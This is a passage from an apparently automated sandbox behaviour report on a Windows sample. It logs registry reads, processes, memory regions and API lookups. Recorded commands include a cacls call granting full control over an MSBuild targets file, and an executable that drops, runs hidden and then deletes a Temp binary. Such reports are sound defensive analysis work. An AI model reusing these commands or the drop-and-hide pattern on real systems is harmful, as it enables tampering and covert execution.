| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xb68, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #195: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #195 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:20, Reason: Child Process |
| Unmonitor | End Time: 00:03:33, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfbc |
| Parent PID | 0xf1c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
888
0x
E1C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000240000 | 0x00240000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x0024ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00253fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00261fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00263fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00283fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00313fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00320fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x00331fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x003d0000 | 0x003d1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00520000 | 0x005ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00700000 | 0x00a36fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e080000 | 0x7e080000 | 0x7e17ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e180000 | 0x7e180000 | 0x7e1a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e1a7000 | 0x7e1a7000 | 0x7e1a9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e1aa000 | 0x7e1aa000 | 0x7e1aafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e1ac000 | 0x7e1ac000 | 0x7e1aefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e1af000 | 0x7e1af000 | 0x7e1affff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #196: qry2vco2.exe
179
0
| Information | Value |
|---|---|
| ID | #196 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "blank.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:20, Reason: Child Process |
| Unmonitor | End Time: 00:03:51, Reason: Self Terminated |
| Monitor Duration | 00:00:31 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9ec |
| Parent PID | 0xf74 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BA8
0x
EC4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00310000 | 0x00339fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00310fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00917fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x00aa0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ab0000 | 0x00ab0000 | 0x01eaffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001eb0000 | 0x01eb0000 | 0x0206ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | os_pid = 0x8b0, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
